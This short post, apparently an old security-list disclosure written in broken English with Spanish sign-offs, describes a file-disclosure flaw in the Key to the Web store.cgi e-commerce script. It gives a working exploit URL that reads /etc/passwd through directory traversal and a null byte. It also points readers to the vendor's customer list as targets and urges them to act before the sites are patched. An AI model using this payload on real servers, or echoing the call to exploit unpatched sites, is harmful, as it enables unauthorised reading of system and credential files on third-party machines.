Hi conrades:
I write about a vulnerability in /cgi-bin/Store/store.cgi <-- This is 
part of a software that Key to the web (http://www.keyweb.com) use for 
her "e-comerce solutions". In her page you can find a list of posible 
webs with this vulnerability (but you must be faster becouse can be 
early patched :). The description about this vulnerability is the next:

Name: Key to the web cgi-bin/Store/store.cgi "Show files" vulnerability.

Problem: Adding the string "/../%00" will allow an remote attacker to   
be able to view any files on the server.

Exploit:
http://www.victim.com/cgi-
bin/Store/store.cgi?product=../../../../../../../../../etc/passwd%00
by: _TacK_ (TacK@ole.com)

Un saludo para la peņa del irc-hispano !!!!!!!
Salud y (A)!!!!!!!!